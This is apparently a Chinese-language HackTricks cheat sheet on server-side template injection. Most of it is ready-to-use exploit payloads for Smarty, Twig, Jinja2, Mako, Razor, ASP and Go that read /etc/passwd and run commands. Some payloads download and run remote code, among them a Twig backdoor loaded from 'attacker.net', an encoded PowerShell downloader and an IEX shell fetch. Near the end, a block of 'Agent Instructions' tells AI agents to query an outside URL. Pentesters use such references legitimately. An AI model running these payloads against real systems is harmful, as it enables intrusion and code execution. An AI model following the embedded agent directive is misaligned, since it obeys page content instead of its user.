# SSTI (Server Side Template Injection)

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式： * 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一，也是**欧洲**最重要的之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士在各个领域的热点交流会。 {% embed url="" %} ## ### Smarty (PHP) ```php {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} {system('ls')} // compatible v3 {system('cat index.php')} // compatible v3 ``` **更多信息** * 在的Smarty部分 * ### Twig (PHP) * `{{7*7}} = 49` * `${7*7} = ${7*7}` * `{{7*'7'}} = 49` * `{{1/0}} = Error` * `{{foobar}} Nothing` ```python #Get Info {{_self}} #(Ref. to current application) {{_self.env}} {{dump(app)}} {{app.request.server.all|join(',')}} #File read "{{'/etc/passwd'|file_excerpt(1,30)}}"@ #Exec code {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}} {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}} {{['id']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}} {{['id',""]|sort('system')}} #Hide warnings and errors for automatic exploitation {{["error_reporting", "0"]|sort("ini_set")}} ``` **Twig - 模板格式** ```php $output = $twig > render ( 'Dear' . $_GET['custom_greeting'], array("first_name" => $user.first_name) ); $output = $twig > render ( "Dear {first_name}", array("first_name" => $user.first_name) ); ``` **更多信息** * 在[Twig和Twig（沙盒）](https://portswigger.net/research/server-side-template-injection)部分 * ### Plates（PHP） Plates是一种原生于PHP的模板引擎，灵感来自Twig。然而，与Twig不同的是，Plates在模板中利用原生PHP代码，使其对PHP开发人员更直观。 ```php // Create new Plates instance $templates = new League\Plates\Engine('/path/to/templates'); // Render a template echo $templates->render('profile', ['name' => 'Jonathan']); ``` 页面模板： ```php layout('template', ['title' => 'User Profile']) ?>

User Profile

Hello, e($name)?>

``` 布局模板： ```html <?=$this->e($title)?> section('content')?> ``` **更多信息** * ### PHPlib 和 HTML\_Template\_PHPLIB (PHP) [HTML\_Template\_PHPLIB](https://github.com/pear/HTML_Template_PHPLIB) 与 PHPlib 相同，但移植到了 Pear。 `authors.tpl` ```html {PAGE_TITLE}

Authors
Name	Email
{NUM_AUTHORS}
{AUTHOR_NAME}	{AUTHOR_EMAIL}

` ```python {% debug %} {{settings.SECRET_KEY}} {{4*4}}[[5*5]] {{7*'7'}} would result in 7777777 ``` **Jinja2 - 模板格式** ```python {% extends "layout.html" %} {% block body %}

{{ user.username }}

{% endblock %} ``` [**不依赖**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__` 的 RCE： ```python {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} # Or in the shotest versions: {{ cycler.__init__.__globals__.os.popen('id').read() }} {{ joiner.__init__.__globals__.os.popen('id').read() }} {{ namespace.__init__.__globals__.os.popen('id').read() }} ``` **关于如何滥用Jinja的更多细节**: {% content-ref url="/pages/F4GHSNlkDMFxOkabLEfP" %} [Jinja2 SSTI](/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md) {% endcontent-ref %} 其他有效载荷请参考 ### Mako (Python) ```python <% import os x=os.popen('id').read() %> ${x} ``` **更多信息** * ### Razor (.Net) * `@(2+2) <= 成功` * `@() <= 成功` * `@("{{code}}") <= 成功` * `@ <= 成功` * `@{} <= 错误！` * `@{ <= 错误！` * `@(1+2)` * `@( //C#Code )` * `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");` * `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBXAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");` .NET的`System.Diagnostics.Process.Start`方法可用于在服务器上启动任何进程，从而创建Webshell。您可以在找到一个易受攻击的Web应用示例。 **更多信息** * * ### ASP * `<%= 7*7 %>` = 49 * `<%= "foo" %>` = foo * `<%= foo %>` = 无 * `<%= response.write(date()) %>` = \ ```xml <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %> ``` **更多信息** * ### Mojolicious (Perl) 即使是 Perl，它也使用类似 Ruby 中的 ERB 标记。 * `<%= 7*7 %> = 49` * `<%= foobar %> = Error` ``` <%= perl code %> <% perl code %> ``` ### GO 中的 SSTI 在 Go 的模板引擎中，可以使用特定的有效载荷来确认其使用方式： * `{{ . }}`: 显示数据结构输入。例如，如果传递了一个带有 `Password` 属性的对象，`{{ .Password }}` 可能会暴露它。 * `{{printf "%s" "ssti" }}`: 预期显示字符串 "ssti"。 * `{{html "ssti"}}`, `{{js "ssti"}}`: 这些有效载荷应返回 "ssti" 而不附加 "html" 或 "js"。更多指令可以在 Go 文档中探索 [这里](https://golang.org/pkg/text/template)。 **XSS 利用** 使用 `text/template` 包，可以通过直接插入有效载荷来简单地进行 XSS 攻击。相反，`html/template` 包对响应进行编码以防止此类攻击（例如，`{{""}}` 的结果是 `<script>alert(1)</script>`）。然而，在 Go 中，模板定义和调用可以绕过此编码：{{define "T1"}}alert(1){{end}} {{template "T1"}} vbnet 复制代码 **RCE 利用** `html/template` 和 `text/template` 之间的 RCE 利用方式有很大不同。`text/template` 模块允许直接调用任何公共函数（使用“call”值），而在 `html/template` 中不允许这样做。这些模块的文档可在 [这里查看 html/template](https://golang.org/pkg/html/template/) 和 [这里查看 text/template](https://golang.org/pkg/text/template/)。对于 Go 中的 SSTI，可以调用对象方法来实现 RCE。例如，如果提供的对象具有执行命令的 `System` 方法，可以像这样利用它：`{{ .System "ls" }}`。通常需要访问源代码才能利用此功能，就像给定的示例中所示： ```go func (p Person) Secret (test string) string { out, _ := exec.Command(test).CombinedOutput() return string(out) } ``` **更多信息** * * ### 更多利用查看获取更多利用。您还可以在中找到有趣的标签信息。 ## BlackHat PDF {% file src="/files/seUP6FPAh0d5BDngdlLR" %} ## 相关帮助如果您认为有用，请阅读： * [Flask技巧](/network-services-pentesting/pentesting-web/flask.md) * [Python魔术函数](https://github.com/carlospolop/hacktricks/blob/cn/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md) ## 工具 * * * * ## 暴力检测列表 {% embed url="" %} ## 练习和参考 * * *

[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一，也是**欧洲**最重要的之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士在各个领域的热点聚会。 {% embed url="" %}

从零开始学习AWS黑客技术，成为专家 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式： * 如果您想在HackTricks中看到您的**公司广告**或**下载PDF**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。 * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktricks.xsx.tw/pentesting-web/ssti-server-side-template-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.